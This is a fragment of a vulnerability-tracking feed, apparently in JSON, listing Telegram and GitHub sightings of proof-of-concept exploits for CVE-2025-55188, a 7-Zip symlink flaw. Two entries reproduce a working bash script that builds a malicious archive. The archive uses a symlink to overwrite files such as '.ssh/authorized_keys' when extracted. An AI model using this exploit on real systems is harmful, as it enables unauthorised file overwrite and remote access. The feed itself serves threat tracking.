"2025-09-25T00:04:33.000000Z"}, {"uuid": "c643f6cc-8717-41c6-bebd-cf08f42b369b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/52854", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\u26a0\ufe0f Demonstrate CVE-2025-55188 with this proof-of-concept exploit for 7-Zip, revealing vulnerabilities in file extraction handling and potential impacts.\nURL\uff1ahttps://github.com/Sh3ruman/CVE-2025-55188-7z-exploit\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-24T03:49:00.000000Z"}, {"uuid": "594487dc-7b8d-4cc8-bb96-a8b087015031", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "Telegram/CISnvBhtpcTpuXbWc1GKhDmNaPppcwD0-mkgvvv0pIShiw8", "content": "", "creation_timestamp": "2025-09-25T04:38:43.000000Z"}, {"uuid": "f13facff-8923-40e7-9c0c-4e100f50ad00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/48500", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\ud83d\udee0\ufe0f Demonstrate CVE-2025-55188, a 7-Zip vulnerability allowing symlink attacks to overwrite files, highlighting crucial security risks for users.\nURL\uff1ahttps://github.com/rhllsingh/CVE-2025-55188-7z-exploit\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-08-21T06:37:53.000000Z"}, {"uuid": "61ec3ee5-7b06-4a44-94ba-c4010bdcabb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/badbclubua/423", "content": "CVE-2025-55188\n7z-exploit\nSymlink Arbitrary File\n7-Zip \u0434\u043e 25.01.\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e 7-Zip \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u0438\u043c \u043b\u0438\u043d\u043a\u0438 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0430\u0440\u0445\u0438\u0432\u0443 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c\u00a0 \u0444\u0430\u0439\u043b\u044b \u0432\u00a0 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n#\n!/bin/bash\nif [ \"$#\" -ne 3 ]; then\n\u00a0\u00a0\u00a0 echo \"Usage: $0   \"\n\u00a0\u00a0\u00a0 echo \"Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z\"\n\u00a0\u00a0\u00a0 exit 1\nfi\n\nPAYLOAD=\"$1\"\nTARGET=\"$2\"\nOUT=\"$3\"\n\nWORKDIR=$(mktemp -d)\nln -s \"$TARGET\" \"$WORKDIR/symlink\"\ncp \"$PAYLOAD\" \"$WORKDIR/symlink\"\n\ntar --sort=name -cf \"$WORKDIR/exploit.tar\" -C \"$WORKDIR\" symlink\n7z a \"$OUT\" \"$WORKDIR/exploit.tar\" &gt;/dev/null\n\necho \"[*] Exploit archive created: $OUT\"\nrm -rf \"$WORKDIR\"", "creation_timestamp": "2025-08-13T20:29:15.000000Z"}, {"uuid": "b9e49d3d-e0c0-4c6a-8c6c-a09aaefcc0fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "Telegram/W8kCmhu2E-XmTD1vroDwkNYrHvBJbZB-N8zWn8RpWxOlZvw", "content": "", "creation_timestamp": "2025-08-12T09:00:04.000000Z"}, {"uuid": "a7b071e8-f0cb-41d1-9b52-fa37e37e3390", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "Telegram/moqY6cW5VnKV_c19yFzOoCThPzN6rcBfQ0zDhyqMg7kJYfg", "content": "", "creation_timestamp": "2025-08-21T03:00:08.000000Z"}, {"uuid": "06056d9c-b0a8-4bbb-9334-0af0e3b0d4e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "Telegram/qKjzf16f-yoe6kFRzbKVYtg9do86sVyWw3gNbfFMakpP", "content": "", "creation_timestamp": "2025-08-15T16:13:06.000000Z"}, {"uuid": "77a33266-1592-4c71-a326-ee3673b3d988", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-55188", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/499", "content": "CVE-2025-55188\n7z-exploit\nSymlink Arbitrary File\n7-Zip \u0434\u043e 25.01.\n \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e 7-Zip \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u0438\u043c \u043b\u0438\u043d\u043a\u0438 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0430\u0440\u0445\u0438\u0432\u0443 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c  \u0444\u0430\u0439\u043b\u044b \u0432  \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n#!/bin/bash\nif [ \"$#\" -ne 3 ]; then\n    echo \"Usage: $0   \"\n    echo \"Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z\"\n    exit 1\nfi\n\nPAYLOAD=\"$1\"\nTARGET=\"$2\"\nOUT=\"$3\"\n\nWORKDIR=$(mktemp -d)\nln -s \"$TARGET\" \"$WORKDIR/symlink\"\ncp \"$PAYLOAD\" \"$WORKDIR/symlink\"\n\ntar --sort=name -cf \"$WORKDIR/exploit.tar\" -C \"$WORKDIR\" symlink\n7z a \"$OUT\" \"$WORKDIR/exploit.tar\" &gt;/dev/null\n\necho \"[*] Exploit archive created: $OUT\"\nrm -rf \"$WORKDIR\"", "creation_timestamp": "2025-08-11T15:49:17.000000Z"}]}